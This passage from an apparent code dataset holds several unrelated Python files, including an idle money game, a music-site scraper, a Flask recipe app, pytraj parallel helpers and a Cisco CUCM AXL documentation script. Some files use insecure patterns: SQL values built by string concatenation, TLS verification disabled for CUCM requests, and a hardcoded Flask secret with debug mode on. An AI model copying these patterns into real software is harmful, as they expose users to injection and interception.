save['scaler']\n\n# Set locale for number formatting\nlocale.setlocale(locale.LC_ALL, 'en_US.utf8')\n\n\ndef number_format(num):\n return locale.format(\"%d\", num, grouping=True)\n\n\nclass item:\n\n def __init__(self, tk_master, name, bpay, bcost, plural, count):\n frame = Frame(tk_master)\n frame.pack()\n global money\n self.name = name\n self.bcost = bcost\n self.plural = plural\n self.buymsg = (self.name + \" purchased!\")\n self.cost = self.bcost\n self.bpay = bpay\n self.pay = self.bpay\n self.count = count\n self.btnmsg = (\"[\" + str(self.count) + \"] Buy \" + self.name)\n self.buyBtn = Button(frame, text=self.btnmsg, command=self.buy,\n justify=CENTER, anchor=N, font=(\"Helvetica\", 10, \"bold\"), relief=FLAT)\n self.buyBtn.config(text=\"[\" + str(self.count) + \"] Buy \" + self.name)\n self.buyBtn.pack(fill=X, ipady=1, ipadx=1)\n # self.Thread = Thread(name=(self.name + \" Thread\"), target=self.Thread_target)\n # self.Thread.daemon = True\n # self.Thread.start()\n\n def get_mps(self):\n return self.count * self.pay\n\n def profitify(self):\n global money\n money += self.count * self.pay\n if self.cost > money:\n self.buyBtn.config(fg=\"gray38\")\n else:\n self.buyBtn.config(fg=\"black\")\n\n def buy(self):\n global money\n if self.cost < money:\n update_status(self.buymsg)\n self.count += 1\n self.buyBtn.config(\n text=\"[\" + str(self.count) + \"] Buy \" + self.name)\n money -= self.cost\n self.inflate()\n mpsLbl.config(text=(\"Money Per Second: \" + number_format(getMPS(thug) + getMPS(\n thief) + getMPS(gang) + getMPS(mobster) + getMPS(mobboss) + getMPS(mafia))))\n else:\n update_status(\"Insufficient funds. \" + self.plural +\n \" Cost: \" + str(number_format(self.cost)))\n\n def inflate(self):\n newcost = round((self.bcost * 0.05), 2)\n self.cost += newcost\n\n # def Thread_target(self):\n # global money\n # while True:\n # time.sleep(1)\n # money += self.count * self.pay\n # if self.cost > money:\n # self.buyBtn.config(fg=\"gray38\")\n # else:\n # self.buyBtn.config(fg=\"black\")\n\n\nroot = Tk()\n\n\ndef moneyLblThreadTarget():\n while True:\n moneyLbl[\"text\"] = (\"$\" + str(number_format(money)))\n\n\n# titleLbl = Label(root, text=\"Black Ink: The Mob\", anchor=N, justify=CENTER, wraplength=120, relief=FLAT, font=(\"overpass\", 9, \"bold\"), bg=\"black\", fg=\"white\")\n# titleLbl.pack(fill=X)\n\n\nmoneyLbl = Label(root, text=\"\", anchor=N, justify=CENTER, wraplength=120,\n relief=FLAT, font=(\"overpass\", 12, \"bold\"), bg=\"black\", fg=\"white\")\nmoneyLbl.pack(ipady=1, ipadx=2, fill=X)\n\n\nmoneyLblThread = Thread(target=moneyLblThreadTarget,\n name=\"MoneyLabelOutputDaemon\")\nmoneyLblThread.daemon = True\nmoneyLblThread.start()\n\nthug = item(root, bpay=1, bcost=25, name=\"Thug\",\n plural=\"Thugs\", count=save['thugs'])\n\nthief = item(root, bpay=(thug.bpay * PRICE_SCALER), bcost=(thug.bcost *\n PRICE_SCALER), name=\"Thief\", plural=\"Thieves\", count=save['thieves'])\n\ngang = item(root, bpay=(thief.bpay * PRICE_SCALER), bcost=(thief.bcost *\n PRICE_SCALER), name='Gang', plural=\"Gangs\", count=save['gangs'])\n\nmobster = item(root, bpay=(gang.bpay * PRICE_SCALER), bcost=(gang.bcost *\n PRICE_SCALER), name=\"Mobster\", plural=\"Mobsters\", count=save['mobsters'])\n\nmobboss = item(root, bpay=(mobster.bpay * PRICE_SCALER), bcost=(mobster.bcost *\n PRICE_SCALER), name=\"Mob Boss\", plural=\"Mob Bosses\", count=save['mobbosses'])\n\nmafia = item(root, bpay=(mobboss.bpay * PRICE_SCALER), bcost=(mobboss.bcost *\n PRICE_SCALER), name=\"Mafia\", plural=\"Mafias\", count=save['mafias'])\n\nregiment = item(root, bpay=(mafia.bpay * PRICE_SCALER), bcost=(mafia.bcost * PRICE_SCALER),\n name=\"Military Regiment\", plural=\"Military Regiments\", count=save['regiments'])\n\ncolony = item(root, bpay=(regiment.bpay * PRICE_SCALER), bcost=(regiment.bcost *\n PRICE_SCALER), name=\"Colony\", plural=\"Colonies\", count=save['colonies'])\n\nmooncolony = item(root, bpay=(colony.bpay * PRICE_SCALER), bcost=(colony.bcost * PRICE_SCALER),\n name=\"Lunar Colony\", plural=\"Lunar Colonies\", count=save['mooncolonies'])\n\nif save['timeofexit'] != False:\n money_while_gone = (round((time.time() - save['timeofexit']), 0) * (thug.get_mps() + thief.get_mps() + gang.get_mps(\n ) + mobster.get_mps() + mobboss.get_mps() + mafia.get_mps() + regiment.get_mps() + colony.get_mps() + mooncolony.get_mps()))\n money += money_while_gone\n\n\ndef counterLoop():\n while True:\n time.sleep(1)\n thug.profitify()\n thief.profitify()\n gang.profitify()\n mobster.profitify()\n mobboss.profitify()\n mafia.profitify()\n regiment.profitify()\n colony.profitify()\n mooncolony.profitify()\n\ncounterThread = Thread(target=counterLoop, name=\"Counter Thread\")\ncounterThread.daemon = True\ncounterThread.start()\n\n# load game data\nthug.count = save['thugs']\nthief.count = save['thieves']\ngang.count = save['gangs']\nmobster.count = save['mobsters']\nmobboss.count = save['mobbosses']\nmafia.count = save['mafias']\nregiment.count = save['regiments']\ncolony.count = save['colonies']\nmooncolony.count = save['mooncolonies']\n\nthug.buyBtn.config(text=\"[\" + str(thug.count) + \"] Buy \" + thug.name)\n\n\ndef exit_game():\n\n confirmRoot = Tk()\n confirmLabel = Label(confirmRoot, text='Save?')\n confirmYes = Button(confirmRoot, text='Yes', command=save_vars)\n confirmNo = Button(confirmRoot, text='No', command=reset_vars)\n\n confirmLabel.pack()\n confirmYes.pack()\n confirmNo.pack()\n confirmRoot.mainloop()\n\n\ndef reset_vars():\n\n save['timeofexit'] = False\n save['scaler'] = False\n save['money'] = 100\n save['thugs'] = 1\n save['thieves'] = 0\n save['gangs'] = 0\n save['mobsters'] = 0\n save['mobbosses'] = 0\n save['mafias'] = 0\n save['regiments'] = 0\n save['colonies'] = 0\n save['mooncolonies'] = 0\n save.close()\n exit()\n\n\ndef save_vars():\n\n time_of_exit = time.time()\n\n save['timeofexit'] = time_of_exit\n save['scaler'] = PRICE_SCALER\n save['money'] = money\n save['thugs'] = thug.count\n save['thieves'] = thief.count\n save['gangs'] = gang.count\n save['mobsters'] = mobster.count\n save['mobbosses'] = mobboss.count\n save['mafias'] = mafia.count\n save['regiments'] = regiment.count\n save['colonies'] = colony.count\n save['mooncolonies'] = mooncolony.count\n save.close()\n exit()\n\natexit.register(exit_game)\n\n\ndef getMPS(target):\n return target.count * target.pay\n\n\ndef showMoney():\n update_status(\"Money: \" + str(money))\n\n\ndef showMps():\n update_status(\"Money Per Second: \" + str((getMPS(thug) + getMPS(thief) +\n getMPS(gang) + getMPS(mobster) + getMPS(mobboss) + getMPS(mafia))))\n\n\ndef steal():\n global money\n # for roughly every $200 player has, stealing profit goes up by one.\n amount_stolen = 1 + int(round(money / 400, 0))\n money += amount_stolen\n update_status(\"Money stolen! +\" + str(amount_stolen) + \" Money!\")\n\n\ndef generateChar(char, number):\n return str(char * number)\n\n\nroot.title(\"Black Ink: The Mob\")\n\nspacer = Label(root, text=generateChar(\" \", 60) + \"\\n\",\n font=(\"Helvetica\", 5, \"underline\"))\nspacer.pack()\n\nstealBtn = Button(root, text=\"Steal\", command=steal, justify=CENTER, anchor=N)\nstealBtn.pack()\n\nmpsLbl = Label(root, text=\"Money Per Second: 1\")\nmpsLbl.pack()\n\nstatus = Label(root, text=\"\", anchor=N, justify=CENTER,\n wraplength=120, relief=FLAT)\nstatus.pack()\n\n\ndef update_status(newText):\n current_status = newText\n status[\"text\"] = current_status\n\nroot.mainloop()\n","sub_path":"blackink.py","file_name":"blackink.py","file_ext":"py","file_size_in_byte":9213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"614634251","text":"# -*- coding: gbk -*-\nfrom selenium import webdriver\nfrom bs4 import BeautifulSoup\nimport re\nimport dbutil\nimport requests\nimport json\n\n\nclass Singer:\n def __init__(self):\n self.driver = webdriver.PhantomJS(executable_path=\"phantomjs.exe\")\n self.re_id = re.compile('\\d+')\n self.table = 'singer'\n self.column = 'user_id,user_name'\n self.conn = dbutil.Database(user='root', passwd='', db='wy_music')\n\n def _get_url(self):\n self.cat_ids = ['1001', '1002', '1003',\n '2001', '2002', '2003',\n '6001', '6002', '6003',\n '7001', '7002', '7003',\n '4001', '4002', '4003']\n self.initial = [-1, 0] + ([65 + i for i in range(26)])\n for i in self.cat_ids:\n for j in self.initial:\n yield 'https://music.163.com/#/discover/artist/cat?id=%s&initial=%s' % (i, j)\n\n def _get_page_source(self, url):\n try:\n self.driver.get(url)\n self.driver.switch_to.frame(self.driver.find_element_by_xpath(\"//iframe\"))\n return self.driver.page_source\n except Exception as e:\n print(e)\n\n def _quit_driver(self):\n self.driver.quit()\n\n # 你不会知道某些歌手的名字里有单引号-0-\n def format_str(self, str):\n return '\\'' + str.replace('\\'', '') + '\\''\n\n def crawl(self):\n for url in self._get_url():\n soup = BeautifulSoup(self._get_page_source(url), \"html.parser\")\n items = soup.find(id='m-artist-box').find_all('li')\n for i in range(len(items)):\n if i < 10:\n id = re.search(self.re_id, items[i].p.a['href']).group()\n name = items[i].p.a.text\n else:\n id = re.search(self.re_id, items[i].a['href']).group()\n name = items[i].a.text\n values = ','.join((str(id), self.format_str(name)))\n print(values)\n self.conn.insert(table=self.table, column=self.column, values=values)\n self.conn.close()\n self._quit_driver()\n\n\nclass HotSong:\n def __init__(self):\n self.table = 'hot_song'\n self.column = 'singer_id,song_id,song_name,album_id,album_name'\n self.conn = dbutil.Database(user='root', passwd='', db='wy_music')\n\n def _get_url(self, **kwargs):\n urls = []\n ids = self.conn.select(**kwargs)\n for id in ids:\n urls.append('https://music.163.com/artist?id=%s' % id)\n return urls\n\n def format_str(self, str):\n if str and len(str) > 0:\n return '\\'' + str.replace('\\'', '').replace('\\\\', '\\\\\\\\') + '\\''\n else:\n return '\\'' + '无此信息!!!!!' + '\\''\n\n def crawl(self):\n _from = 0\n limit = 100\n success = False\n while not success:\n res = self._get_url(column='singer_id', table='singer', _from=_from, limit=limit)\n if len(res) >= 1:\n print(_from)\n for url in res:\n print(url)\n try:\n req = requests.get(url, timeout=10)\n soup = BeautifulSoup(req.text, 'html.parser')\n text = soup.find(id='song-list-pre-cache').find('textarea').text\n songs = json.loads(text)\n except Exception as e:\n self.conn.insert(table='failure', column='url,note', values=','.join((self.format_str(url), self.format_str(str(e)))))\n continue\n for song in songs:\n singer_id = song['artists'][0]['id']\n song_id = song['id']\n song_name = song['name']\n album_id = song['album']['id']\n album_name = song['album']['name']\n print(singer_id, song_id, song_name, album_id, album_name)\n values = ','.join((self.format_str(str(singer_id)),\n self.format_str(str(song_id)),\n self.format_str(song_name),\n self.format_str(str(album_id)),\n self.format_str(album_name)))\n self.conn.insert(table=self.table, column=self.column, values=values)\n _from += limit\n else:\n success = True\n self.conn.close()\n\n\nif __name__ == '__main__':\n s = HotSong()\n s.crawl()\n","sub_path":"163_music_singer.py","file_name":"163_music_singer.py","file_ext":"py","file_size_in_byte":4658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"388318880","text":"import random as r\nimport time as t\nfrom colorama import init, Fore, Back, Style\nnombre=input(\"Hola vamos a jugar a piedra papel o tijera, mi nombre es ktlm4. ¿Y tú, cómo te llamas ? \")\nprint(\" encantado de conocerte \" + nombre)\nprint(\"empezamos\")\nt.sleep(2)\ntu=0\nyo=0\nwhile yo<3 and tu<3:\n lista=[\"piedra\",\"papel\",\"tijera\"]\n print(\"piedra,papel o tijera\")\n t.sleep(1)\n print(\"una, dos y tres\")\n t.sleep(2)\n\n print(Fore.GREEN+r.choice(lista))\n print(Fore.WHITE)\n ganado=input(\"¿quien ha ganado? \")\n if ganado==\"tu\":\n tu=tu+1\n print()\n elif ganado==\"empate\":\n print()\n else:\n yo=yo+1\n print()\nif tu>yo:\n ganador=\"tú\"\n print(Fore.BLUE+\"¡Gané yo!\")\nelse:\n ganador=\"yo\"\n print(Fore.BLUE+\"¡Ganaste! \" + nombre+Fore.WHITE)","sub_path":"piedra papel tijera.py","file_name":"piedra papel tijera.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"510405240","text":"#Simple Calculator program\r\ndef the_calc():\r\n \"\"\"\r\n Calculates based off of user input\r\n This is an example of a docstring\r\n \"\"\"\r\n print(\"Welcome!\")\r\n while True:\r\n try:\r\n \r\n print(\"\\nOptions Menu\")\r\n print(\"Enter 'add' to add two numbers\")\r\n print(\"Enter 'subtract' to subtract two numbers\")\r\n print(\"Enter 'multiply' to multiply two numbers\")\r\n print(\"Enter 'divide' to divide two numbers\")\r\n print(\"Enter 'quit' to exit the program\")\r\n user_input = input(\": \")\r\n \r\n if user_input == \"quit\":\r\n break\r\n elif user_input == \"add\":\r\n add1 = float(input(\"Type the first number:\"))\r\n add2 = float(input(\"Type the second number:\"))\r\n add3 = float(add1) + float(add2)\r\n print (\"The result is:\", add3)\r\n contconfirm = input(\"Press enter to continue:\")\r\n elif user_input == \"subtract\":\r\n subtract1 = float(input(\"Type the first number:\"))\r\n subtract2 = float(input(\"Type the second number:\"))\r\n subtract3 = float(subtract1) - float(subtract2)\r\n print (\"The result is:\", subtract3)\r\n contconfirm = input(\"Press enter to continue:\")\r\n elif user_input == \"multiply\":\r\n multiply1 = float(input(\"Type the first number:\"))\r\n multiply2 = float(input(\"Type the second number:\"))\r\n multiply3 = float(multiply1) * float(multiply2)\r\n print (\"The result is:\", multiply3)\r\n contconfirm = input(\"Press enter to continue:\")\r\n elif user_input == \"divide\":\r\n divide1 = float(input(\"Type the first number:\"))\r\n divide2 = float(input(\"Type the second number:\"))\r\n divide3 = float(divide1) / float(divide2)\r\n print (\"The result is:\", divide3)\r\n contconfirm = input(\"Press enter to continue:\")\r\n else:\r\n print(\"Unknown Input\")\r\n except ValueError:\r\n pass\r\n print(\"Invalid entry!\")\r\n\r\nthe_calc()\r\n\r\n","sub_path":"Calculator.py","file_name":"Calculator.py","file_ext":"py","file_size_in_byte":2552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"581201202","text":"import numpy as np\nfrom functools import partial\nfrom pytraj import Frame\nfrom pytraj import pipe\nfrom pytraj.datasets import CpptrajDatasetList\nfrom pytraj.externals.six import string_types\n\n\ndef check_valid_command(commands):\n '''\n\n Parameters\n ----------\n commands : list/tuple of str\n\n Returns\n -------\n cmlist : newly updated command list\n need_ref : bool, whether to provide reference or not\n '''\n from pytraj.c_commands import analysis_commands\n\n if isinstance(commands, string_types):\n commands = [line.strip() for line in commands.split('\\n') if line]\n else:\n commands = commands\n\n new_commands = commands[:]\n need_ref = False\n for idx, cm in enumerate(commands):\n cm = cm.strip()\n\n # try to insert 'refindex 0' if action requires ref but user does not provide\n if 'refindex' in cm:\n need_ref = True\n\n if ((cm.startswith('rms') or\n cm.startswith('nastruct') or\n cm.startswith('center') or\n cm.startswith('distrmsd') or\n cm.startswith('nativecontacts') or\n cm.startswith('symmetricrmsd')) and 'refindex' not in cm):\n\n cm = cm + ' refindex 0 '\n need_ref = True\n\n if cm.startswith('matrix'):\n raise ValueError('Not support matrix')\n\n for word in analysis_commands:\n if cm.startswith(word):\n raise ValueError(\n 'Not support cpptraj analysis keyword for parallel '\n 'calculation. You can use pmap for cpptraj actions to speed up the '\n 'IO and then perform '\n 'analysis in serial')\n new_commands[idx] = cm\n\n return new_commands, need_ref\n\n\ndef worker_byfunc(rank,\n n_cores=None,\n func=None,\n traj=None,\n args=None,\n kwd=None,\n iter_options=None,\n apply=None):\n '''worker for pytraj's functions\n '''\n # need to unpack args and kwd\n if iter_options is None:\n iter_options = {}\n mask = iter_options.get('mask')\n rmsfit = iter_options.get('rmsfit')\n autoimage = iter_options.get('autoimage', False)\n iter_func = apply\n frame_indices = kwd.pop('frame_indices', None)\n\n if frame_indices is None:\n my_iter = traj._split_iterators(n_cores,\n rank=rank,\n mask=mask,\n rmsfit=rmsfit,\n autoimage=autoimage)\n else:\n my_indices = np.array_split(frame_indices, n_cores)[rank]\n my_iter = traj.iterframe(frame_indices=my_indices,\n mask=mask,\n rmsfit=rmsfit,\n autoimage=autoimage)\n n_frames = my_iter.n_frames\n kwd_cp = {}\n kwd_cp.update(kwd)\n\n if iter_func is not None:\n final_iter = iter_func(my_iter)\n kwd_cp['top'] = my_iter.top\n else:\n final_iter = my_iter\n\n data = func(final_iter, *args, **kwd_cp)\n return (rank, data, n_frames)\n\n\ndef worker_by_actlist(rank,\n n_cores=2,\n traj=None,\n lines=None,\n dtype='dict',\n ref=None,\n kwd=None):\n '''worker for cpptraj commands (string)\n '''\n # need to make a copy if lines since python's list is dangerous\n # it's easy to mess up with mutable list\n # do not use lines.copy() since this is not available in py2.7\n # Note: dtype is a dummy argument, it is always 'dict'\n if lines is None:\n lines = []\n frame_indices = kwd.pop('frame_indices', None)\n\n new_lines, need_ref = check_valid_command(lines)\n\n if frame_indices is None:\n my_iter = traj._split_iterators(n_cores, rank=rank)\n else:\n my_iter = traj.iterframe(\n frame_indices=np.array_split(frame_indices, n_cores)[rank])\n\n if ref is not None:\n if isinstance(ref, Frame):\n reflist = [ref, ]\n else:\n # list/tuplex\n reflist = ref\n else:\n reflist = [traj[0],] if need_ref else []\n\n dslist = CpptrajDatasetList()\n\n if reflist:\n for ref_ in reflist:\n ref_dset = dslist.add('reference')\n ref_dset.top = traj.top\n ref_dset.add_frame(ref_)\n\n # create Frame generator\n fi = pipe(my_iter, commands=new_lines, dslist=dslist)\n\n # just iterate Frame to trigger calculation.\n for _ in fi:\n pass\n\n # remove ref\n return (rank, dslist[len(reflist):].to_dict())\n\n\ndef _load_batch_pmap(n_cores=4,\n lines=None,\n traj=None,\n dtype='dict',\n root=0,\n mode='multiprocessing',\n ref=None,\n **kwd):\n '''mpi or multiprocessing\n '''\n if lines is None:\n lines = []\n if mode == 'multiprocessing':\n from multiprocessing import Pool\n pfuncs = partial(worker_by_actlist,\n n_cores=n_cores,\n traj=traj,\n dtype=dtype,\n lines=lines,\n ref=ref,\n kwd=kwd)\n pool = Pool(n_cores)\n data = pool.map(pfuncs, range(n_cores))\n pool.close()\n pool.join()\n return data\n elif mode == 'mpi':\n from mpi4py import MPI\n comm = MPI.COMM_WORLD\n rank = comm.rank\n data_chunk = worker_by_actlist(rank=rank,\n n_cores=n_cores,\n traj=traj,\n dtype=dtype,\n lines=lines,\n ref=ref,\n kwd=kwd)\n # it's ok to use python level `gather` method since we only do this once\n # only gather data to root, other cores get None\n data = comm.gather(data_chunk, root=root)\n return data\n else:\n raise ValueError('only support multiprocessing or mpi')\n\n\ndef worker_state(rank, n_cores=1, traj=None, lines=None, dtype='dict'):\n '''worker for CpptrajState\n '''\n # need to make a copy if lines since python's list is dangerous\n # it's easy to mess up with mutable list\n # do not use lines.copy() since this is not available in py2.7\n if lines is None:\n lines = []\n my_lines = [line for line in lines]\n from pytraj.utils import split_range\n from pytraj.core.c_core import _load_batch\n\n mylist = split_range(n_cores, 0, traj.n_frames)[rank]\n start, stop = mylist\n crdframes_string = 'crdframes ' + ','.join((str(start + 1), str(stop)))\n\n for idx, line in enumerate(my_lines):\n if not line.lstrip().startswith('reference'):\n my_lines[idx] = ' '.join(('crdaction traj', line, crdframes_string\n ))\n\n # do not use 'extend' in this case\n # will get weird output\n my_lines = ['loadtraj name traj', ] + my_lines\n\n state = _load_batch(my_lines, traj)\n\n state.run()\n if dtype == 'dict':\n # exclude DatasetTopology and TrajectoryCpptraj\n return (rank, state.data[2:].to_dict())\n else:\n raise ValueError('must use dtype=\"dict\"')\n","sub_path":"pytraj/parallel/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":7518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"513514104","text":"\"\"\"Server for recipe conversion app.\"\"\"\n\nfrom flask import (Flask, render_template, request, flash, session,\n redirect)\n\nfrom model import connect_to_db\nimport crud\n\nfrom jinja2 import StrictUndefined\n\napp = Flask(__name__)\napp.secret_key = \"RANDOM SECRET KEY\"\napp.jinja_env.undefined = StrictUndefined\n\n# Replace this with routes and view functions!\n\n@app.route('/')\ndef homepage():\n \"\"\"View homepage. Has button for existing user to log in and button to create new account\"\"\"\n\n user_email = request.args.get('email')\n user_password = request.args.get('password')\n\n return render_template('homepage.html')\n\n\n\n@app.route('/create_new_account')\ndef create_new_account():\n \"\"\"Create new user account with email and password.\"\"\"\n\n username = request.args.get('username')\n user_email = request.args.get('email')\n user_password = request.args.get('password')\n \n return render_template('create_new_account.html')\n\n#need to set username to session; for create account and for log in\n\n\n@app.route('/user_profile_page')\ndef user_profile_page():\n \"\"\"Displays user's profile page.\"\"\"\n\n return render_template('user_profile_page.html')\n\n\n\n@app.route('/build_recipe')\ndef build_recipe():\n \"\"\" User can build a recipe and set it to dietary specification \"\"\"\n\n return render_template('build_recipe.html')\n\n\n@app.route('/get_ingredients', methods=['POST'])\ndef get_ingred_from_user():\n \"\"\" Gets ingredients user enters; saves to session \"\"\" #Trying to add ingredient to session; to then display on next page\n \n GLUTEN_TO_GF = { \n '1/2 cup all purpose flour': (('1/2 cup', 'gluten-free flour'), ('1/8 tsp.', 'xantham gum')),\n '1 cup all purpose flour': (('1 cup gluten-free flour'), ('1/4 tsp. xantham gum')),\n }\n\n recipe_name = request.form.get('recipe_name')\n recipe_instructions = request.form.get('recipe_instructions')\n num_servings = request.form.get('num_servings')\n prep_time_in_min = request.form.get('prep_time_in_min')\n cook_time_in_min = request.form.get('cook_time_in_min')\n ingredient = request.form['ingred_1']\n measurement = request.form['ingred_1_M']\n details = request.form.get('ingred_1_details')\n\n print(recipe_name, recipe_instructions, num_servings, prep_time_in_min, cook_time_in_min, ingredient, measurement, details) \n\n # create a recipe object:\n # create_recipe(user_id, recipe_name, recipe_instructions, num_servings, prep_time_in_min, cook_time_in_min, image)\n crud.create_recipe(recipe_name, recipe_instructions, num_servings, prep_time_in_min, cook_time_in_min) #NOTE: user_id and image not defined- get errors\n\n # f'{measurement} {ingredient}' check this as key in GLUTEN_TO_GF and grab the correct value/tuple\n # with the above recipe you've just created, now create the ingredient object \n # with the new converted ingredient and measurement based on the value/tuple above\n\n \n # return redirect('/display_recipe') \n return 'Success' \n\n\n@app.route('/display_recipe')\ndef display_recipe():\n \"\"\" User receives back recipe according to dietary specification \"\"\"\n\n return render_template('display_recipe.html')\n\n\n\n@app.route('/user_logged_out')\ndef user_logged_out():\n \"\"\"Tells user that they've successfully logged out; has button that links back to homepage.\"\"\"\n\n return render_template('user_logged_out.html') \n\n\n\nif __name__ == \"__main__\":\n # DebugToolbarExtension(app)\n connect_to_db(app)\n app.run(host=\"0.0.0.0\", debug=True)","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"164732977","text":"#!/usr/bin/env python3\n__author__ = 'Andrea Dainese '\n__copyright__ = 'Andrea Dainese '\n__license__ = 'https://www.gnu.org/licenses/gpl.html'\n__revision__ = '20180903'\n\nfrom zeep.cache import SqliteCache\nimport getopt, glob, jinja2, lxml, logging, markdown, os, requests, sys, yaml, urllib3, zeep\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\ndef usage():\n print('Usage: {} [OPTIONS]'.format(sys.argv[0]))\n print(' -d enable debug')\n print(' -f STRING path to Cisco AXLAPI.wsdl file')\n print(' -i STRING CUCM IP address or FQDN')\n print(' -p STRING CUCM password')\n print(' -t STRING AutoDOC template')\n print(' -u STRING CUCM username')\n print(' -w STRING AutoDOC working directory')\n sys.exit(1)\n\ndef main():\n binding_name = \"{http://www.cisco.com/AXLAPIService/}AXLAPIBinding\"\n cucm_url = None\n cucm_username = None\n cucm_password = None\n debug = False\n template_dir = None\n working_dir = None\n wsdl_file = None\n\n # Configure logging\n logging.basicConfig()\n logger = logging.getLogger()\n zeep_transport_logger = logging.getLogger('zeep.transports')\n logger.setLevel(logging.ERROR)\n\n # Reading options\n try:\n opts, args = getopt.getopt(sys.argv[1:], 'df:i:p:t:u:w:')\n except getopt.GetoptError as err:\n logger.error('exception while parsing options', exc_info = debug)\n usage()\n for opt, arg in opts:\n if opt == '-d':\n debug = True\n logger.setLevel(logging.DEBUG)\n zeep_transport_logger.setLevel(logging.DEBUG)\n zeep_transport_logger.propagate = True\n elif opt == '-f':\n wsdl_file = os.path.abspath('{}/{}'.format(os.getcwd(), arg))\n elif opt == '-i':\n cucm_url = 'https://{}:8443/axl/'.format(arg)\n elif opt == '-p':\n cucm_password = arg\n elif opt == '-t':\n template_dir = os.path.abspath('{}/templates/{}'.format(os.getcwd(), arg))\n elif opt == '-u':\n cucm_username = arg\n elif opt == '-w':\n working_dir = os.path.abspath('{}/working/{}'.format(os.getcwd(), arg))\n else:\n logger.error('unhandled option ({})'.format(opt))\n usage()\n\n # Checking options\n if len(sys.argv) == 1:\n usage()\n if not wsdl_file:\n logger.error('WSDL file not specified')\n sys.exit(1)\n if not os.path.isfile(wsdl_file):\n logger.error('WSDL file \"{}\" not found'.format(wsdl_file))\n sys.exit(1)\n if not cucm_url:\n logger.error('CUCM host not specified')\n sys.exit(1)\n if not cucm_username:\n logger.error('CUCM username not specified')\n sys.exit(1)\n if not cucm_password:\n logger.error('CUCM password not specified')\n sys.exit(1)\n if not template_dir:\n logger.error('template directory not specified')\n sys.exit(1)\n if not os.path.isdir(template_dir):\n logger.error('template directory \"{}\" not found'.format(template_dir))\n sys.exit(1)\n if not working_dir:\n logger.error('working directory not specified')\n sys.exit(1)\n try:\n os.makedirs(working_dir, mode = 0o755, exist_ok = True)\n except Exception as err:\n logger.error('failed to create working directory \"{}\" (exception)'.format(working_dir), exc_info = debug)\n sys.exit(1)\n logger.debug('wsdl_file is \"{}\"'.format(wsdl_file))\n logger.debug('cucm_url is \"{}\"'.format(cucm_url))\n logger.debug('CUCM credentials are \"{}:{}\"'.format(cucm_username, cucm_password))\n logger.debug('template_dir is \"{}\"'.format(template_dir))\n logger.debug('working_dir is \"{}\"'.format(working_dir))\n\n # Configure Jinja2\n templateLoader = jinja2.FileSystemLoader(searchpath = template_dir)\n templateEnv = jinja2.Environment(loader = templateLoader)\n\n # Configure Zeep (for SOAP requests)\n session = requests.Session()\n session.verify = False\n session.auth = requests.auth.HTTPBasicAuth(cucm_username, cucm_password)\n transport = zeep.transports.Transport(cache = SqliteCache(), session = session, timeout = 20)\n history = zeep.plugins.HistoryPlugin()\n client = zeep.Client(wsdl = wsdl_file, transport = transport, plugins = [history])\n axl = client.create_service(binding_name, cucm_url)\n\n # Defining request data\n listUser = {\n 'searchCriteria': {\n 'lastName': '%'\n },\n 'returnedTags': {\n 'firstName': '',\n 'lastName': '',\n 'userid': '',\n 'telephoneNumber': ''\n }\n }\n\n listPhone = {\n 'searchCriteria': {\n 'name': '%'\n },\n 'returnedTags': {\n 'name': '',\n 'description': '',\n 'model': '',\n 'isActive': ''\n\n }\n }\n\n getPhone = {\n 'name': 'SEPCC5A5362CE1C'\n }\n\n sql = {\n 'sql': \"SELECT description, dnorpattern FROM numplan np WHERE np.tkpatternusage = 2 AND np.iscallable = 'f'\"\n }\n\n # Getting data from the CUCM\n try:\n users = axl.listUser(**listUser)['return']['user']\n except zeep.exceptions.Fault:\n logger.error('failed to get users via SOAP request', exc_info = debug)\n for hist in [history.last_sent, history.last_received]:\n logging.debug(lxml.etree.tostring(hist['envelope'], encoding = 'unicode', pretty_print = True))\n\n try:\n phones = axl.listPhone(**listPhone)['return']['phone']\n except zeep.exceptions.Fault:\n logger.error('failed to get phones via SOAP request', exc_info = debug)\n for hist in [history.last_sent, history.last_received]:\n logging.debug(lxml.etree.tostring(hist['envelope'], encoding = 'unicode', pretty_print = True))\n # Better read object per object, more details, less errors on API. Even if it slower\n #try:\n # phone = axl.getPhone(**getPhone)['return']\n # print(phone)\n #except zeep.exceptions.Fault:\n # for hist in [history.last_sent, history.last_received]:\n # print(lxml.etree.tostring(hist[\"envelope\"], encoding=\"unicode\", pretty_print=True))\n\n #try:\n # # Read the CUCM Data Dictionary\n # sql_result = axl.executeSQLQuery(**sql)['return']\n # print(sql_result)\n #except zeep.exceptions.Fault:\n # for hist in [history.last_sent, history.last_received]:\n # print(lxml.etree.tostring(hist[\"envelope\"], encoding=\"unicode\", pretty_print=True))\n\n # Create MarkDown files from Jinja2 templates and fetched data\n for template_file in glob.glob('{}/*.md'.format(template_dir)):\n template_data = {\n 'users': users,\n 'phones': phones\n }\n template = templateEnv.get_template(os.path.basename(template_file))\n outputText = template.render(template_data)\n file = open('{}/{}'.format(working_dir, os.path.basename(template_file)), 'w')\n file.write(outputText)\n file.close()\n\nif __name__ == '__main__':\n main()\n sys.exit(0)\n","sub_path":"get_cucm_info.py","file_name":"get_cucm_info.py","file_ext":"py","file_size_in_byte":7102,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"126765584","text":"import os\nimport shutil\nfrom distutils.dir_util import copy_tree\nimport build_util\n\nBUILD_PATH = os.getcwd()\nWORKSPACE_PATH = f\"{os.getcwd()}/../autolens_workspace\"\nNOTEBOOKS_ROOT_PATH = f\"{WORKSPACE_PATH}/notebooks\"\nNOTEBOOKS_NO_RUN = [\n \"mask.ipynb\",\n \"positions.ipynb\",\n \"lens_light_centre.ipynb\",\n \"scaled_dataset.ipynb\",\n \"tutorial_3_lens_and_source.ipynb\",\n 